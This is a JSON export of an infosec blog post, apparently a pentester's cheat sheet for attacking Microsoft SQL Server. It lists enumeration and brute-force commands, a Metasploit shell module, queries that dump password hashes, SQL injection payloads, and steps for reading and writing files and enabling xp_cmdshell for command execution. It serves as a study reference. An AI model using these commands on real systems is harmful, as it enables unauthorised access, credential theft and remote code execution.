{"id":1013,"date":"2020-03-25T10:05:06","date_gmt":"2020-03-25T09:05:06","guid":{"rendered":"https:\/\/andreas-klingler.de\/infosec\/?p=1013"},"modified":"2026-06-04T11:44:42","modified_gmt":"2026-06-04T09:44:42","slug":"microsoft-sql","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=1013","title":{"rendered":"<span class=\"caps\">MSSQL<\/span> Microsoft <span class=\"caps\">SQL<\/span>"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Access\u00ading in&nbsp;Linux:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">impacket-mssqlclient Administrator:password@$target -windows-auth<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Default data\u00adbas\u00ades&nbsp;are:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>mas\u00adter<\/li>\n\n\n\n<li>tem\u00adpdb<\/li>\n\n\n\n<li>mod\u00adel<\/li>\n\n\n\n<li>msdb<\/li>\n<\/ul>\n\n\n\n<h1 class=\"wp-block-heading\">Enumeration<\/h1>\n\n\n\n<p class=\"wp-block-paragraph\">Deter\u00admine version<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">nmap -p 445 --script ms-sql-info $target<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Via metas\u00adploit<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">auxiliary\/scanner\/mssql\/mssql_ping<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Via Impack\u00adet<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">mssqlinstance.py $target<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Login brute&nbsp;force<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">scanner\/mssql\/mssql_login<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">When an account is known, enu\u00admer\u00adate for vulnerabilities<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">auxiliary\/admin\/mssql\/mssql_enum<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Exploitation<\/h1>\n\n\n\n<p class=\"wp-block-paragraph\">Exe\u00adcute commands<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">auxiliary\/admin\/mssql\/mssql_exec<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Get shell<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">windows\/mssql\/mssql_payload<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Tools<\/h1>\n\n\n\n<p class=\"wp-block-paragraph\">Com\u00admand&nbsp;line<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">sqsh -U sa -P $password -S $target:1433<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">From Pow\u00ader\u00adShell<\/p>\n\n\n\n<div class=\"page\" title=\"Page 12\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<pre>sqlcmd -S $DBNAME -Q \"use ADsync; select instance_id,keyset_id,entropy from mms_server_configuration\"<\/pre>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n\n\n\n<p class=\"wp-block-paragraph\">Graph\u00adi\u00adcal<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">dbeaver<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\">IntelliJ<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Exploita\u00adtion<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/github.com\/quentinhardy\/msdat\">msdat<\/a><\/li>\n<\/ul>\n\n\n\n<h1 class=\"wp-block-heading\">Usage<\/h1>\n\n\n\n<p class=\"wp-block-paragraph\">After a com\u00admand in a native <span class=\"caps\">MSSQL<\/span> com\u00admand line, we need to type <code>\\go<\/code> to exe\u00adcute&nbsp;it.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">1&gt; SELECT VERSION();\n2&gt; \\go<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This is <em>not<\/em> need\u00aded in some tools like Impack\u00adets <em>mssql\u00adclient<\/em>.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Limit syntax<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">There is no lim\u00adit. This returns a sin\u00adgle <em>ran\u00addom<\/em> (!)&nbsp;row:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">SELECT TOP 1 * FROM ...<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This returns the first item. To get oth\u00ader&nbsp;items:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h1 class=\"wp-block-heading\">Useful queries<\/h1>\n\n\n\n<p class=\"wp-block-paragraph\">Get ver\u00adsion:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">SELECT @@version;<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Cur\u00adrent\u00adly con\u00adnect\u00aded&nbsp;user:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">SELECT SYSTEM_USER;<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Enu\u00admer\u00adat\u00ading&nbsp;users<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">SELECT name FROM master.syslogins;<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Enu\u00admer\u00adat\u00ading&nbsp;users<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">SELECT * FROM master.sys.sysusers;<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Enu\u00admer\u00adat\u00ading data\u00adbas\u00ades. Use N = 0,1,2,\u2026<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">SELECT DB_NAME(2);<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Pass\u00adword hash\u00ades from <span class=\"caps\">SQL<\/span>&nbsp;users<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">SELECT name, password_hash FROM master.sys.sql_logins;<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Enu\u00admer\u00adat\u00ading databases<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">SELECT name FROM master..sysdatabases;<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Cur\u00adrent database<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">SELECT DB_NAME();<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Get tables from a spe\u00adcif\u00adic database:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">SELECT * FROM $dbname.information_schema.tables;<\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Then, query like this:<br><code>SELECT * FROM $dbname.$schema.$tableName;<\/code><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Enu\u00admer\u00adate via error based approach:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>If this is an inte\u00adger field:<br><code>cast((SELECT DB_NAME() as integer)<\/code><\/li>\n\n\n\n<li>If this is a string field:<br><code>' + cast((SELECT DB_NAME() as integer) + '<\/code><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Read local&nbsp;files<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">CREATE TABLE ttt (line varchar(8000));\n\nBULK INSERT ttt FROM 'C:\\Windows\\System32\\License.rtf';\nSELECT * FROM ttt;\nDELETE FROM ttt;\n...\n\nDROP TABLE ttt;<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Write files. This requires the bcp mod\u00adule. Enter it with\u00adout para\u00adme\u00adters and exe\u00adcute the com\u00admand to see if it is installed.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">bcp \"SELECT * FROM ttt\" queryout C:\\rrr.htm -c -Slocalhost -Usa -P$pass<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Pos\u00adsi\u00adble alternative<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">execute spWriteStringToFile 'This article ctddfd', 'C:\\inetpub\\wwwroot\\','d.txt'<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Exe\u00adcute command<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">EXEC xp_cmdshell 'dir'<\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Note: Should xp_cmdshell not been acti\u00advat\u00aded, try to acti\u00advate it:<br><code>SQL <code>(SQLPLAYGROUND\\Administrator dbo@master)&gt;<\/code> EXECUTE sp_configure 'show advanced options', 1;<\/code><br><code>SQL (SQLPLAYGROUND\\Administrator dbo@master)&gt; RECONFIGURE;<br>SQL (SQLPLAYGROUND\\Administrator dbo@master)&gt; EXECUTE sp_configure 'xp_cmdshell', 1;<br>[*] INFO(SQL01\\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.<br>SQL (SQLPLAYGROUND\\Administrator dbo@master)&gt; RECONFIGURE;<\/code><\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">For <span class=\"caps\">INSERT<\/span> queries<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Try to get infor\u00adma\u00adtion with\u00adin the con\u00advert statement:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">' + convert(int,@@version) + '<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Notes<\/h1>\n\n\n\n<p class=\"wp-block-paragraph\">Use\u00adful ressources with more queries:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"http:\/\/pentestmonkey.net\/cheat-sheet\/sql-injection\/mssql-sql-injection-cheat-sheet\">pen\u00adtest\u00admon\u00adkey<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/gracefulsecurity.com\/sql-injection-cheat-sheet-mssql\/\">grace\u00adfulse\u00adcu\u00adri\u00adty<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/book.hacktricks.xyz\/pentesting\/pentesting-mssql-microsoft-sql-server\">hacktricks.xyz<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/www.exploit-db.com\/papers\/12975\">exploit\u00addb&nbsp;paper<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/www.exploit-db.com\/docs\/english\/44348-error-based-sql-injection-in-order-by-clause-(mssql).pdf\">Error based <span class=\"caps\">SQL<\/span> injection<\/a><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Access\u00ading in&nbsp;Lin\u00adux: impack\u00adet-mssql\u00adclient Administrator:password@$target \u2011win\u00addows-auth Default data\u00adbas\u00ades&nbsp;are: Enu\u00admer\u00ada\u00adtion Deter\u00admine ver\u00adsion nmap \u2011p 445 \u2013script ms-sql-info $tar\u00adget Via metas\u00adploit auxiliary\/scanner\/mssql\/mssql_ping Via Impack\u00adet mssqlinstance.py $tar\u00adget Login brute&nbsp;force scanner\/mssql\/mssql_login When an account is known, enu\u00admer\u00adate for vul\u00adner\u00ada\u00adbil\u00adi\u00adties auxiliary\/admin\/mssql\/mssql_enum Exploita\u00adtion Exe\u00adcute com\u00admands auxiliary\/admin\/mssql\/mssql_exec Get shell windows\/mssql\/mssql_payload Tools Com\u00admand&nbsp;line sqsh \u2011U sa \u2011P $pass\u00adword \u2011S $target:1433 From Pow\u00ader\u00adShell sql\u00adcmd \u2011S [\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[323],"tags":[233],"class_list":["post-1013","post","type-post","status-publish","format-standard","hentry","category-protocol","tag-sql-server"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1013","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1013"}],"version-history":[{"count":36,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1013\/revisions"}],"predecessor-version":[{"id":4981,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1013\/revisions\/4981"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1013"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1013"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1013"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}